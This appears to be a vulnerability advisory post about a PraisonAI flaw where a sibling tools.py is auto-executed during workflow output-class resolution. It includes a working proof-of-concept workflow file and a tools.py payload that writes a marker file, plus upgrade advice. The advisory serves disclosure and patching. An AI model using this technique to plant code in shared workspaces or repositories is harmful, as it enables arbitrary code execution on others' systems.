Listen to this Post
The vulnerability resides within the workflow structured output resolution logic of the PraisonAI framework, specifically inside the `AgentFlow._resolve_pydantic_class` method located in src/praisonai-agents/praisonaiagents/workflows/workflows.py. When a workflow step utilizes a string reference for its `output_pydantic` parameter, the workflow engine automatically attempts to resolve the target class dynamically. During this resolution process, the framework extracts the path of the loaded workflow file and checks for the existence of a sibling `tools.py` file within the exact same directory. If such a file exists, Python’s dynamic module loading functions (importlib.util.spec_from_file_location and spec.loader.exec_module()) are invoked to load and execute the file instantly. Crucially, this execution path operates entirely without sandboxing or integrity verification checks, and it explicitly ignores the safety environment variables (PRAISONAI_ALLOW__TOOLS) designed to restrict arbitrary tool execution across other parts of the project. An attacker who is capable of supplying or controlling a workflow configuration file alongside a crafted `tools.py` script can force the workflow engine to execute arbitrary Python code. This code execution occurs automatically upon workflow startup, inheriting the full privileges of the user running the process without requiring any explicit user approval or manual import steps. Consequently, environments that process untrusted workspaces, remote templates, shared repositories, or CI/CD artifacts are directly exposed to complete system compromise.
DailyCVE Form:
Platform: PraisonAI
Version: Before 1.6.78
Vulnerability: Unsafe dynamic loading
Severity: High
date: July 10, 2026
Prediction: Already patched update
(end of form)
What Undercode Say
python3 -m pip install --upgrade praisonaiagents
import sys
sys.path.insert(0, "/home/user/praisonai/src/praisonai-agents")
from praisonaiagents.workflows import WorkflowManager
from praisonaiagents.agent.agent import Agent
mgr = WorkflowManager()
wf = mgr.load_yaml("/tmp/attack/attack.yaml")
wf.file_path = "/tmp/attack/attack.yaml"
Exploit: (Educational Purposes!)
Create the following workflow file at `/tmp/attack/attack.yaml`:
name: AttackWorkflow steps: - name: generate action: "Produce structured output" output_pydantic: MaliciousModel
Create the sibling file at `/tmp/attack/tools.py`:
print("[bash] Arbitrary code executed from tools.py")
import os
with open("/tmp/rce_success.txt", "w") as f:
f.write(f"RCE executed by PID {os.getpid()}")
class MaliciousModel:
@classmethod
def model_json_schema(cls):
return {"type": "object"}
Protection: from this CVE
Upgrade the `praisonaiagents` package to version 1.6.78 or higher, which implements proper validation and restricts unsafe dynamic module loading. Avoid loading workflows or repositories from untrusted or unverified sources.
Impact:
Allows attackers who can control a workflow file and a sibling `tools.py` to achieve arbitrary Python code execution within the workflow process. Successful exploitation can lead to local file reads, secret exfiltration, workflow behavior tampering, and the execution of arbitrary system commands under the privileges of the workflow runner.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

